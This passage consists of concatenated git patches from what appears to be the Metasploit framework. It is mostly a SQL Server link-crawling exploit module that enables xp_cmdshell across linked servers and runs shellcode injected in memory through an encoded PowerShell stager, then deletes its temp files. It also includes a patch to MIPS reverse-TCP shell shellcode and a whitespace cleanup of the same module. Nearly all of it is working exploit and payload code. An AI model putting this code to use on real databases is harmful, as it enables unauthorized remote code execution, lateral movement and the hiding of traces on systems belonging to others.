:proto => 'tcp' + ) + end + + # Display end time + time1 = Time.new + print_status("End time : #{time1.inspect}") + print_status("-------------------------------------------------") + + # Write log to loot / file + if (save_loot=="yes") + filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv" + path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service) + print_status("Results have been saved to: #{path}") + end + end + + + # --------------------------------------------------------------------- + # Method that builds nested openquery statements using during crawling + # --------------------------------------------------------------------- + def query_builder(path,sql,ticks,execute) + + # Temp used to maintain the original masterList[x]["path"] + temp = Array.new + path.each {|i| temp << i} + + # Actual query - defined when the function originally called - ticks multiplied + if path.length == 0 + return execute.gsub("'","'"*2**ticks) + + # openquery generator + else + sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")" + return sql + end + end + + # --------------------------------------------------------------------- + # Method that builds nested openquery statements using during crawling + # --------------------------------------------------------------------- + def query_builder_rpc(path,sql,ticks,execute) + + # Temp used to maintain the original masterList[x]["path"] + temp = Array.new + path.each {|i| temp << i} + + # Actual query - defined when the function originally called - ticks multiplied + if path.length == 0 + return execute.gsub("'","'"*2**ticks) + + # Openquery generator + else + exec_at = temp.shift + sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]" + return sql + end + end + + + # --------------------------------------------------------------------- + # Method for adding new linked database servers to the crawl list + # --------------------------------------------------------------------- + def add_host(name,path,parse_results) + + # Used to add new servers to masterList + server = Hash.new + server["name"] = name + temppath = Array.new + path.each {|i| temppath << i } + server["path"] = [temppath] + server["path"].first << name + server["done"] = 0 + parse_results.each {|stuff| + server["db_user"] = stuff.at(1) + server["db_sysadmin"] = stuff.at(2) + server["db_version"] = stuff.at(3) + server["db_os"] = stuff.at(4) + server["numlinks"] = stuff.at(6) + } + return server + end + + + # --------------------------------------------------------------------- + # Method to display configuration information + # --------------------------------------------------------------------- + def show_configs(i,parse_results,entry=false) + + print_status(" ") + parse_results.each {|stuff| + + # Translate syadmin code + status = stuff.at(5) + if status == 1 then + dbpriv = "sysadmin" + else + dbpriv = "user" + end + + # Display database link information + if entry == false + print_status("Linked Server: #{i}") + print_status(" o Link user: #{stuff.at(1)}") + print_status(" o Link privs: #{dbpriv}") + print_status(" o Link version: #{stuff.at(3)}") + print_status(" o Link OS: #{stuff.at(4).strip}") + print_status(" o Links on server: #{stuff.at(6)}") + else + print_status("Server: #{i}") + print_status(" o Server user: #{stuff.at(1)}") + print_status(" o Server privs: #{dbpriv}") + print_status(" o Server version: #{stuff.at(3)}") + print_status(" o Server OS: #{stuff.at(4).strip}") + print_status(" o Server on server: #{stuff.at(6)}") + end + } + end + + # --------------------------------------------------------------------- + # Method for generating the report and loot + # --------------------------------------------------------------------- + def write_to_report(i,server,parse_results,linked_server_table,link_status) + parse_results.each {|stuff| + + # Parse server information + db_link_user = stuff.at(1) + db_link_sysadmin = stuff.at(2) + db_link_version = stuff.at(3) + db_link_os = stuff.at(4) + + # Add link server to the reporting array and set link_status to 'up' + linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status] + + return linked_server_table + } + end + + + # --------------------------------------------------------------------- + # Method for enabling xp_cmdshell + # --------------------------------------------------------------------- + def enable_xp_cmdshell(path,name,shelled) + # Enables "show advanced options" and xp_cmdshell if needed and possible + # They cannot be enabled in user transactions (i.e. via openquery) + # Only enabled if RPC_Out is enabled for linked server + # All changes are reverted after payload delivery and execution + + # Check if "show advanced options" is enabled + execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + saoOrig = result[:rows].pop.pop + + # Check if "xp_cmdshell" is enabled + execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + xpcmdOrig = result[:rows].pop.pop + + # Try blindly to enable "xp_cmdshell" on the linked server + # Note: + # This only works if rpcout is enabled for all links in the link path. + # If that is not the case it fails cleanly. + if xpcmdOrig == 0 + if saoOrig == 0 + # Enabling show advanced options and xp_cmdshell + execute = "sp_configure 'show advanced options',1;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + + # Enabling xp_cmdshell + print_status("\t - xp_cmdshell is not enabled on " + path.last + "... Trying to enable") + execute = "sp_configure 'xp_cmdshell',1;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + + # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.) + execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + xpcmdNow = result[:rows].pop.pop + + if xpcmdNow == 1 or xpcmdOrig == 1 + print_status("\t - Enabled xp_cmdshell on " + path.last) if xpcmdOrig == 0 + if datastore['DEPLOY'] + print_status("Ready to deploy a payload #{name}") + if datastore['DEPLOYLIST']=="" + datastore['DEPLOYLIST'] = nil + end + if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - Checking if #{name} is on the deploy list...") + end + if datastore['DEPLOYLIST'] != nil + deploylist = datastore['DEPLOYLIST'].upcase.split(',') + end + if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase + if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - #{name} is on the deploy list.") + end + unless shelled.include?(name) + powershell_upload_exec(path) + shelled << name + else + print_status("Payload already deployed on #{name}") + end + elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - #{name} is not on the deploy list") + end + end + else + print_error("\t - Unable to enable xp_cmdshell on " + path.last) + end + + # Revert soa and xp_cmdshell to original state + if xpcmdOrig == 0 and xpcmdNow == 1 + print_status("\t - Disabling xp_cmdshell on " + path.last) + execute = "sp_configure 'xp_cmdshell',0;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + if saoOrig == 0 and xpcmdNow == 1 + execute = "sp_configure 'show advanced options',0;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + end + + + # ---------------------------------------------------------------------- + # Method that delivers shellcode payload via powershell thread injection + # ---------------------------------------------------------------------- + def powershell_upload_exec(path) + + # Create powershell script that will inject shell code from the selected payload + myscript ="$code = @\" +[DllImport(\"kernel32.dll\")] +public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); +[DllImport(\"kernel32.dll\")] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +[DllImport(\"msvcrt.dll\")] +public static extern IntPtr memset(IntPtr dest, uint src, uint count); +\"@ +$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru +[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')} +$size = 0x1000 +if ($sc.Length -gt 0x1000) {$size = $sc.Length} +$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) +for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} +$winFunc::CreateThread(0,0,$x,0,0,0)" + + # Unicode encode powershell script + mytext_uni = Rex::Text.to_unicode(myscript) + + # Base64 encode unicode + mytext_64 = Rex::Text.encode_base64(mytext_uni) + + # Generate random file names + rand_filename = rand_text_alpha(8) + var_duplicates = rand_text_alpha(8) + + # Write base64 encoded powershell payload to temp file + # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations + # Also, line number tracking was added so that duplication lines causes by nested linked + # queries could be found and removed. + print_status("Deploying payload...") + linenum = 0 + mytext_64.scan(/.{1,2500}/).each {|part| + execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + linenum = linenum+1 + } + + # Remove duplicate lines from temp file and write to new file + execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + + # Remove tracking tags from lines + execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + + # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors + # If running on 64bit system, 32bit powershell called from syswow64 + powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like '*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe -noexit -noprofile -encodedCommand $dacode\"};iex $psbits" + powershell_uni = Rex::Text.to_unicode(powershell_cmd) + powershell_64 = Rex::Text.encode_base64(powershell_uni) + + # Setup query + execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'" + sql = query_builder(path,"",0,execute) + + + # Execute the playload + print_status("Executing payload...") + result = mssql_query(sql, false) if mssql_login_datastore + # Remove payload data from the target server + execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql,false) + end +end From ce82b37289c121c1cc93cc97885e527edd648421 Mon Sep 17 00:00:00 2001 From: Vlatko Kosturjak Date: Sun, 28 Oct 2012 21:22:33 +0100 Subject: [PATCH 004/154] Few removals of unneccessary zero bytes in sc --- .../singles/linux/mipsle/shell_reverse_tcp.rb | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 6a73205f29..85cb4a0e2d 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -10,6 +10,7 @@ ## # Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org) +# + Few removals of unneccessary zero bytes by kost require 'msf/core' require 'msf/core/handler/reverse_tcp' @@ -84,7 +85,7 @@ module Metasploit3 "\x02\x00\x05\x24" + # li a1,2 "\x21\x30\x00\x00" + # move a2,zero "\x57\x10\x02\x24" + # li v0,4183 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x21\x18\x40\x00" + # move v1,v0 "\xff\xff\x02\x24" + # li v0,-1 "\x1a\x00\x62\x10" + # beq v1,v0,0xf4 @@ -93,29 +94,29 @@ module Metasploit3 "\x08\x00\xa5\x27" + # addiu a1,sp,8 "\x10\x00\x06\x24" + # li a2,16 "\x4a\x10\x02\x24" + # li v0,4170 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x0e\x00\x40\x14" + # bnez v0,0xe0 "\x21\x28\x00\x00" + # move a1,zero "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x01\x00\x05\x24" + # li a1,1 "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x02\x00\x05\x24" + # li a1,2 "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x21\x30\x00\x00" + # move a2,zero "\x21\x20\x20\x03" + # move a0,t9 "\x20\x00\xa5\x27" + # addiu a1,sp,32 "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x21\x20\x00\x00" + # move a0,zero "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x08\x00\xe0\x03" + # jr ra "\x28\x00\xbd\x27" + # addiu sp,sp,40 "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\xe5\xff\x00\x10" + # b 0x94 "\x21\x20\x60\x00" + # move a0,v1 "\x2f\x62\x69\x6e" + # "/bin" From 8bb95e9f1776a278a2b69505c98ec5973696b328 Mon Sep 17 00:00:00 2001 From: nullbind Date: Thu, 1 Nov 2012 20:56:52 -0500 Subject: [PATCH 005/154] msftidy updates --- .../windows/mssql/mssql_linkcrawler.rb | 265 ++++++++---------- 1 file changed, 124 insertions(+), 141 deletions(-) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 042fe61e24..a5c846af6a 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -3,7 +3,7 @@ require 'msf/core/exploit/mssql_commands' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report include Msf::Exploit::CmdStagerVBS @@ -12,33 +12,18 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server - Database Link Crawler', - 'Description' => %q{ - This module can be used to crawl MS SQL Server database links and - deploy metasploit payloads through links configured with sysadmin - privileges via a direct database connection once a valid set of - credentials have been provided. If you are attempting to obtain - multiple reverse shells using this module we recommend setting the - “DisablePayloadHandler” advanced option to “true”, and setting up - a multi/handler to run in the background as a job to support - multiple incoming shells. If you are interested in deploying - payloads to spefic servers this module also supports that - functionality via the “DEPLOYLIST” option. Currently, the module - is capable of delivering payloads to both 32bit and 64bit Windows - systems via powershell memory injection methods based on Matthew - Graeber’s work . As a result, the target server must have - powershell installed. By default, all of the crawl information is - saved to a CSV formatted log file and MSF loot so that the tool - can also be used for auditing without deploying payloads. - }, + 'Description' => %q{When provided credentials, this module will crawl + SQL Server database links and identify links configured with sysadmin privileges.}, 'Author' => [ - 'Antti Rantasaari ', - 'nullbind ' + 'Antti Rantasaari ', + 'nullbind ' ], 'Platform' => [ 'Windows' ], 'License' => MSF_LICENSE, 'References' => [[ 'URL', 'http://www.netspi.com/' ]], 'Platform' => 'win', + 'DisclosureDate' => 'Jan 1 2000', 'Targets' => [ [ 'Automatic', { } ], @@ -47,31 +32,29 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options( - [ + [ OptBool.new('VERBOSE', [false, 'Set how verbose the output should be', 'false']), - OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), - ], self.class) end - - def exploit - # Display start time + def exploit + # Display start time time1 = Time.new print_status("-------------------------------------------------") - print_status("Start time : #{time1.inspect}") - print_status("-------------------------------------------------") - + print_status("Start time : #{time1.inspect}") + print_status("-------------------------------------------------") + # Check if credentials are correct print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") - + if (not mssql_login_datastore) print_error("Invalid SQL Server credentials") print_status("-------------------------------------------------") return end - + # Define master array to keep track of enumerated database information masterList = Array.new masterList[0] = Hash.new # Define new hash @@ -83,25 +66,30 @@ class Metasploit3 < Msf::Exploit::Remote masterList[0]["db_os"] = "" # OS of the linked database server masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored masterList[0]["done"] = 0 # Used to determine if linked need to be crawled - + shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system - + # Setup query for gathering information from database servers - versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE(ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT(char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+ CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 -charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount" - + versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\ + (ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT\ + (char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\ + CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 \ + -charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \ + master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount" + # Create loot table to store configuration information from crawled database server links linked_server_table = Rex::Ui::Text::Table.new( 'Header' => 'Linked Server Table', - 'Ident' => 1, + 'Ident' => 1, 'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state'] - ) + ) save_loot = "" # Start crawling through linked database servers while masterList.any? {|f| f["done"] == 0} # Find the first DB server that has not been crawled (not marked as done) server = masterList.detect {|f| f["done"] == 0} - + # Get configuration information from the database server sql = query_builder(server["path"].first,"",0,versionQuery) result = mssql_query(sql, false) if mssql_login_datastore @@ -125,26 +113,26 @@ class Metasploit3 < Msf::Exploit::Remote if server["db_sysadmin"] == 1 enable_xp_cmdshell(server["path"].first,server["name"],shelled) end - + # If links were found, determine if they can be connected to and add to crawl list if (server["numlinks"] > 0) # Enable loot save_loot = "yes" - + # Select a list of the linked database servers that exist on the current database server print_status("") print_status("-------------------------------------------------") print_status("Crawling links on #{server["name"]}...") - # Display number db server links - print_status("Links found: #{server["numlinks"]}") + # Display number db server links + print_status("Links found: #{server["numlinks"]}") print_status("-------------------------------------------------") execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'" - sql = query_builder(server["path"].first,"",0,execute) + sql = query_builder(server["path"].first,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore - + result[:rows].each {|name| - name.each {|name| - + name.each {|name| + # Check if link works and if sysadmin permissions - temp array to save orig server[path] temppath = Array.new temppath = server["path"].first.dup @@ -153,19 +141,19 @@ class Metasploit3 < Msf::Exploit::Remote # Get configuration information from the linked server sql = query_builder(temppath,"",0,versionQuery) result = mssql_query(sql, false) if mssql_login_datastore - - # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists - if result[:errors].empty? and result[:rows] != nil then + + # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists + if result[:errors].empty? and result[:rows] != nil then # Assign db query results to variables for hash - parse_results = result[:rows] - + parse_results = result[:rows] + # Add link server information to loot link_status = 'up' write_to_report(name,server,parse_results,linked_server_table,link_status) - + # Display link server information in verbose mode if datastore['VERBOSE'] == true - show_configs(name,parse_results) + show_configs(name,parse_results) print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") else if parse_results[0][5] == 1 @@ -174,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") end end - + # Add link to masterlist hash unless masterList.any? {|f| f["name"] == name} masterList << add_host(name,server["path"].first,parse_results) @@ -192,14 +180,14 @@ class Metasploit3 < Msf::Exploit::Remote break end end - end + end else # Add to report - linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] - + linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] + # Display status to user if datastore['VERBOSE'] == true - print_status(" ") + print_status(" ") print_error("Linked Server: #{name} ") print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") print_status(" Failure could be due to:") @@ -214,11 +202,11 @@ class Metasploit3 < Msf::Exploit::Remote } end # Set server to "crawled" - server["done"]=1 + server["done"]=1 end - + print_status("-------------------------------------------------") - + # Setup table for loot this_service = nil if framework.db and framework.db.active @@ -229,54 +217,53 @@ class Metasploit3 < Msf::Exploit::Remote :proto => 'tcp' ) end - - # Display end time + + # Display end time time1 = Time.new print_status("End time : #{time1.inspect}") - print_status("-------------------------------------------------") - + print_status("-------------------------------------------------") + # Write log to loot / file if (save_loot=="yes") filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv" path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service) print_status("Results have been saved to: #{path}") - end - end - - + end + end + # --------------------------------------------------------------------- # Method that builds nested openquery statements using during crawling # --------------------------------------------------------------------- def query_builder(path,sql,ticks,execute) - + # Temp used to maintain the original masterList[x]["path"] temp = Array.new path.each {|i| temp << i} - + # Actual query - defined when the function originally called - ticks multiplied if path.length == 0 return execute.gsub("'","'"*2**ticks) - + # openquery generator else sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")" return sql end end - + # --------------------------------------------------------------------- # Method that builds nested openquery statements using during crawling # --------------------------------------------------------------------- def query_builder_rpc(path,sql,ticks,execute) - + # Temp used to maintain the original masterList[x]["path"] temp = Array.new path.each {|i| temp << i} - + # Actual query - defined when the function originally called - ticks multiplied if path.length == 0 return execute.gsub("'","'"*2**ticks) - + # Openquery generator else exec_at = temp.shift @@ -284,55 +271,53 @@ class Metasploit3 < Msf::Exploit::Remote return sql end end - - + # --------------------------------------------------------------------- # Method for adding new linked database servers to the crawl list # --------------------------------------------------------------------- def add_host(name,path,parse_results) - + # Used to add new servers to masterList server = Hash.new - server["name"] = name + server["name"] = name temppath = Array.new path.each {|i| temppath << i } server["path"] = [temppath] server["path"].first << name - server["done"] = 0 - parse_results.each {|stuff| + server["done"] = 0 + parse_results.each {|stuff| server["db_user"] = stuff.at(1) server["db_sysadmin"] = stuff.at(2) server["db_version"] = stuff.at(3) - server["db_os"] = stuff.at(4) + server["db_os"] = stuff.at(4) server["numlinks"] = stuff.at(6) - } + } return server end - - + # --------------------------------------------------------------------- # Method to display configuration information # --------------------------------------------------------------------- def show_configs(i,parse_results,entry=false) - + print_status(" ") - parse_results.each {|stuff| - + parse_results.each {|stuff| + # Translate syadmin code status = stuff.at(5) - if status == 1 then - dbpriv = "sysadmin" + if status == 1 then + dbpriv = "sysadmin" else - dbpriv = "user" + dbpriv = "user" end - + # Display database link information if entry == false print_status("Linked Server: #{i}") - print_status(" o Link user: #{stuff.at(1)}") - print_status(" o Link privs: #{dbpriv}") - print_status(" o Link version: #{stuff.at(3)}") - print_status(" o Link OS: #{stuff.at(4).strip}") + print_status(" o Link user: #{stuff.at(1)}") + print_status(" o Link privs: #{dbpriv}") + print_status(" o Link version: #{stuff.at(3)}") + print_status(" o Link OS: #{stuff.at(4).strip}") print_status(" o Links on server: #{stuff.at(6)}") else print_status("Server: #{i}") @@ -342,29 +327,27 @@ class Metasploit3 < Msf::Exploit::Remote print_status(" o Server OS: #{stuff.at(4).strip}") print_status(" o Server on server: #{stuff.at(6)}") end - } + } end - + # --------------------------------------------------------------------- # Method for generating the report and loot # --------------------------------------------------------------------- def write_to_report(i,server,parse_results,linked_server_table,link_status) - parse_results.each {|stuff| - + parse_results.each {|stuff| # Parse server information db_link_user = stuff.at(1) db_link_sysadmin = stuff.at(2) db_link_version = stuff.at(3) - db_link_os = stuff.at(4) + db_link_os = stuff.at(4) # Add link server to the reporting array and set link_status to 'up' - linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status] - + linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status] + return linked_server_table } end - - + # --------------------------------------------------------------------- # Method for enabling xp_cmdshell # --------------------------------------------------------------------- @@ -373,44 +356,44 @@ class Metasploit3 < Msf::Exploit::Remote # They cannot be enabled in user transactions (i.e. via openquery) # Only enabled if RPC_Out is enabled for linked server # All changes are reverted after payload delivery and execution - + # Check if "show advanced options" is enabled execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'" sql = query_builder(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore saoOrig = result[:rows].pop.pop - + # Check if "xp_cmdshell" is enabled execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" sql = query_builder(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore xpcmdOrig = result[:rows].pop.pop - + # Try blindly to enable "xp_cmdshell" on the linked server - # Note: + # Note: # This only works if rpcout is enabled for all links in the link path. - # If that is not the case it fails cleanly. - if xpcmdOrig == 0 + # If that is not the case it fails cleanly. + if xpcmdOrig == 0 if saoOrig == 0 # Enabling show advanced options and xp_cmdshell execute = "sp_configure 'show advanced options',1;reconfigure" sql = query_builder_rpc(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore end - + # Enabling xp_cmdshell print_status("\t - xp_cmdshell is not enabled on " + path.last + "... Trying to enable") execute = "sp_configure 'xp_cmdshell',1;reconfigure" sql = query_builder_rpc(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore end - + # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.) execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" sql = query_builder(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore xpcmdNow = result[:rows].pop.pop - + if xpcmdNow == 1 or xpcmdOrig == 1 print_status("\t - Enabled xp_cmdshell on " + path.last) if xpcmdOrig == 0 if datastore['DEPLOY'] @@ -441,7 +424,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_error("\t - Unable to enable xp_cmdshell on " + path.last) end - + # Revert soa and xp_cmdshell to original state if xpcmdOrig == 0 and xpcmdNow == 1 print_status("\t - Disabling xp_cmdshell on " + path.last) @@ -455,14 +438,13 @@ class Metasploit3 < Msf::Exploit::Remote result = mssql_query(sql, false) if mssql_login_datastore end end - - + # ---------------------------------------------------------------------- # Method that delivers shellcode payload via powershell thread injection # ---------------------------------------------------------------------- def powershell_upload_exec(path) - - # Create powershell script that will inject shell code from the selected payload + + # Create powershell script that will inject shell code from the selected payload myscript ="$code = @\" [DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); @@ -478,54 +460,55 @@ if ($sc.Length -gt 0x1000) {$size = $sc.Length} $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} $winFunc::CreateThread(0,0,$x,0,0,0)" - + # Unicode encode powershell script - mytext_uni = Rex::Text.to_unicode(myscript) - - # Base64 encode unicode + mytext_uni = Rex::Text.to_unicode(myscript) + + # Base64 encode unicode mytext_64 = Rex::Text.encode_base64(mytext_uni) # Generate random file names rand_filename = rand_text_alpha(8) var_duplicates = rand_text_alpha(8) - + # Write base64 encoded powershell payload to temp file - # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations + # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations # Also, line number tracking was added so that duplication lines causes by nested linked - # queries could be found and removed. + # queries could be found and removed. print_status("Deploying payload...") - linenum = 0 - mytext_64.scan(/.{1,2500}/).each {|part| - execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" + linenum = 0 + mytext_64.scan(/.{1,2500}/).each {|part| + execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" sql = query_builder(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore - linenum = linenum+1 + linenum = linenum+1 } - - # Remove duplicate lines from temp file and write to new file + + # Remove duplicate lines from temp file and write to new file execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'" sql = query_builder(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore - + # Remove tracking tags from lines execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'" sql = query_builder(path,"",0,execute) result = mssql_query(sql, false) if mssql_login_datastore - + # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors # If running on 64bit system, 32bit 